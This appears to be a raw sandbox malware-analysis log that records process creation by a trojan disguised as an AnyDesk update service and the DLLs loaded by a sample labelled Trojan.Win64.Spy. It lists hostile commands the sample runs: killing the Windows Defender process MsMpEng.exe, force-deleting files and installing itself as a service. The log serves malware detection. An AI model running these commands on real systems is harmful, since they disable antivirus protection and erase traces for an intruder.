Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\oobe\AnyDeskCrashHandler.exe "C:\Windows\System32\oobe\AnyDeskCrashHandler.exe" --pid 6552
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\oobe\AnyDeskUpdateService.exe C:\Windows\System32\oobe\AnyDeskUpdateService.exe install
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\sc.exe sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\oobe\version.txt"
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start AnyDeskUpdateService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c DEL /F /S /Q "C:\Windows\System32\WindowsUpdate.txt"
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im MsMpEng.exe
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\sc.exe sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc start MicrosoftWindowsDefenderCoreService
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Windows\System32\oobe\AnyDeskUpdateService.exeProcess created: unknown unknown
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win64.Spy.1125.10281.exeSection loaded: mswsock.dllJump to behavior
